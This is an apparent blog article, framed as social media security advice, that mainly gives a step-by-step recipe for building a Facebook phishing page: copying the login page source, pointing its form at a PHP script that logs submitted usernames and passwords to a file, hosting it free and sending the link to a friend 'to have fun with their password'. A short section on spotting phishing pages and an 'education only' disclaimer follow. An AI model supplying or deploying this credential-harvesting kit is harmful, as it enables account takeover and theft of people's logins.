11 November 2013

Created Under:

How to be secure in social media networks

Share

The most famous technique to hack your social network is
1.    Phishing 
2.    Cookie stealing
3.    Key logger
Here “cookie stealing and key logger” is not that much successful technique it works when you are connected to internet. Key logger is a method it is fully based on your presence if you are alert then it to wont work. Without your knowledge hacker cant able to install key logger in your system.

PHISHING

  This is a method works and makes you to let in to trouble. It is very easy to escape from this type of hacking. You can’t able to identify the difference between the phishing page and the original Facebook login page. The pages will look similar so you will login over there then hacker can easily get your password.

HOW TO DO Facebook PHISHING PAGE

Step1: Just copy the source code of Facebook by right click on the login page then -> view page source ->ctrl A -> ctrl C

Step2: Open the note pad and paste the code then give ctrl F to find then in that find dialog box type action then press enter twice.


Then you can see the link as ”https://www.facebook.com/login.php?login_attempt=1" method="post”
Just remove the link and give “phishing.php” and save the file as index.html

Step3:
 <?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Just copy this script and paste this script in notepad and save it as phishing.php

Step 4: Then open an empty notepad and save it as log.txt.
Step 5: now you have all the three files so just host these 3 files in any free domain hosting sites.
Step 6: Now send the URL to your friend and have a fun with their password

HOW TO IDENTIFY THE PHISHING PAGE:

 It is simpler to identify the phishing page.

Step 1:

Before login to the Facebook page please just verify the URL.

Step 2:

If the URL is not www.facebook.com  then please avoid login because it is sure that if the URL is not www.facebook.com  then the page is dams sure it is a phishing page.

Step 3:

Other ways to identify the phishing page
Just see the URL it will be like www.name.freewebhositing.com the hacker will get the hosting from any free webhost from there you can easily identify the phishing page.

Step 4:

Another way is that if you get any page like phishing page if you are getting scared to login in that page just do the following in that page.

Right click-> view page source ->then press ctrl f

Then you can see a dialogue box in that enter “action” without quotes.

Then give enter you can see the highlighted action blocks there on a particular action you can see the login form action =”https://www.facebook.com/login.php?login_attempt=1" method="post” if it is not there then sure it is a phishing page.

Step 5: if it is a phishing page then you will see this text over the action area.



This article is completely for education purpose alone. Do not use this in a bad way
Article by Shankar 

Feedback

We would love to hear, give us a message.

Name Email * Message *

Tweet, tweet!